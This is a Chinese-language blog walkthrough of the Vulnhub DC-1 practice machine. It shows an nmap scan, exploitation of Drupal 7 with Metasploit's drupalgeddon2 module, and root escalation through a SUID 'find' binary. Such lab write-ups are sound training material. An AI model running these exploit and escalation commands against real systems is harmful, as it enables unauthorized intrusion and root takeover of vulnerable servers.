首页 > 其他分享 >Vulnhub:DC-1靶机

Vulnhub:DC-1靶机

时间:2023-04-02 22:04:23浏览次数:76  
标签:drupal DC 192.168 漏洞 Vulnhub 111.248 靶机 find

kali:192.168.111.111

靶机:192.168.111.248

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.248

image

访问80端口发现CMS为drupal 7

image

image

搜索发现该版本的drupal存在漏洞

searchsploit drupal

image

漏洞利用

使用msf的exploit/unix/webapp/drupal_drupalgeddon2模块进行漏洞利用

use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.111.248
run

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/find/#suid

image

提升为root

find . -exec /bin/bash -p \; -quit

image

flag

image

标签:drupal,DC,192.168,漏洞,Vulnhub,111.248,靶机,find
From: https://www.cnblogs.com/ctostm/p/17281496.html

相关文章

  • 04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询
    思路:发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束基操代码不再粘贴首先进行目标靶机地址的......
  • re/【unity】游戏逆向首试 [BJDCTF2020]BJD hamburger competition
    本题是是一个unity游戏,而且是以c#和.net编写尝试直接用idea进行反汇编,但是没有找到运行逻辑,后来在大佬的wp上发现是利用dnspy对c#的dll文件进行返回编,进而获得结果。反汇编BJDhanburgercompetirion_Data中的Assembly-CSharp.dll即可获得如下代码段:可以看到先利用sha1进行加......
  • Acrobat+PRO+DC+PDF+编辑器
    Acrobat+PRO+DC+PDF+编辑器 下载链接https://cloud.189.cn/web/share?code=iquuYrE7Fzq2访问码:sa5u ......
  • Vulnhub:DC-2靶机
    kali:192.168.111.111靶机:192.168.111.249信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.249wpscan收集目标wordpress用户wpscan--urlhttp://dc-2-eu使用cewl收集目标网站信息生成字典cewlhttp://dc-2/-wpass.txt爆破目标wordpres......
  • Vulnhub:DC-6靶机
    kali:192.168.111.111靶机:192.168.111.247信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.247访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问使用wpscan爆破目标用户wpscan--urlhttp://wordy-eu爆破用的密码字典根据作......
  • 命令行工具 nerdctl
    前面我们介绍了可以使用ctr操作管理containerd镜像容器,但是大家都习惯了使用dockercli,ctr使用起来可能还是不太顺手,为了能够让大家更好的转到containerd上面来,社区提供了一个新的命令行工具:nerdctl。nerdctl是一个与dockercli风格兼容的containerd客户端工具,而且......
  • Vulnhub:Hackme:1靶机
    kali:192.168.111.111靶机:192.168.111.245信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.245访问目标80端口,注册用户登陆后在搜索框位置存在sql注入漏洞利用利用sqlmap获得目标数据库信息sqlmap-o-r./a.txt--batch--level5--risk3......
  • LIDC-IDRI肺结节项目 -- 预处理数据集
    实战参考代码:代码一、路径、参数配置(lung.conf)lidc_dicom_path:LIDC_IDRI数据集原始位置 image_path,mask_path:保存处理后的含有结节的肺部图像和掩码图像路径clean_path_image,clean_path_mask:保存处理后的不含有结节的肺部图像和掩码图像路径meta_path:保存结节元......
  • CloudCanal 落地 DB2 数据迁移同步功能
    简述Db2是一款具有悠久历史的关系型数据库,由IBM公司开发和维护,广泛应用于金融级业务场景。CloudCanal近期提供了Db2为源端的数据迁移同步功能,用户可以便利地将Db2中数据实时同步到其他数据库,实现数据更广泛、更实时的应用。功能介绍目标数据库和能力目标端数据源......
  • DC-DC直流线性可调升压模块高压稳压输出电源5v12v24v48v转0-300V0-500V/0-600V/0-1000
    GRB系列非隔离宽电压输入高电压稳压输出特点 效率高达75%以上 1*2英寸标准封装 单电压输出 可直接焊在PCB上 工作温度:-40℃~+75℃ 阻燃封装,满足UL94-V0要求 温度特性好 电压控制输出,输出电压随控制电压的变化线应用GRB系列模块电源是一种DC-DC升压变换器。该模块电......